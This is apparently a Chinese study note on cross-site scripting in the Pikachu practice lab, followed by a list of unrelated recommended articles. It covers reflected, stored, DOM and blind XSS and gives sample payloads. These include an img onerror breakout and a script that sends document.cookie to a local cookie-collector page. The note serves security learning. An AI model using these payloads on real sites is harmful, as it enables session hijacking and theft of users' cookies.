网安-XSS-pikachu

介绍

XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问

Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。

XSS分类一般如下:

1.反射型XSS

2.存储型XSS

3.DOM型XSS

1.反射型XSS,非持久性XSS

alert(document.cookie) //弹出当前cookie

2.存储型XSS,持久性XSS,JS代码会存在后台

3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法

'"><img onerror=alert(0) src=><"'

利用XSS进行攻击:

攻击方:

找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php

编辑攻击代码:

<script>

document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

</script>

用户访问留言板,攻击方就收集到用户的cookie 了

4.XSS盲打

攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。

输入的内容不会在前端输出,而是提交到了后台。

管理员登录后台管理界面,可能遭受到XSS攻击。

5.XSS过滤

<script>

alert(document.cookie)

</script>

相关推荐
酸菜土狗8 小时前
🔥 纯 JS 实现 SQL 字段智能解析工具类,前端也能玩转 SQL 解析
前端
wo不是黄蓉8 小时前
脚手架步骤流程
前端
我这一生如履薄冰~9 小时前
css属性pointer-events: none
前端·css
brzhang9 小时前
A2UI:但 Google 把它写成协议后,模型和交互的最后一公里被彻底补全
前端·后端·架构
石像鬼₧魂石9 小时前
内网渗透是网络安全渗透测试
安全·web安全
coderHing[专注前端]9 小时前
告别 try/catch 地狱:用三元组重新定义 JavaScript 错误处理
开发语言·前端·javascript·react.js·前端框架·ecmascript
UIUV9 小时前
JavaScript中this指向机制与异步回调解决方案详解
前端·javascript·代码规范
momo1009 小时前
IndexedDB 实战:封装一个通用工具类,搞定所有本地存储需求
前端·javascript
liuniansilence9 小时前
🚀 高并发场景下的救星:BullMQ如何实现智能流量削峰填谷
前端·分布式·消息队列
再花9 小时前
在Angular中实现基于nz-calendar的日历甘特图
前端·angular.js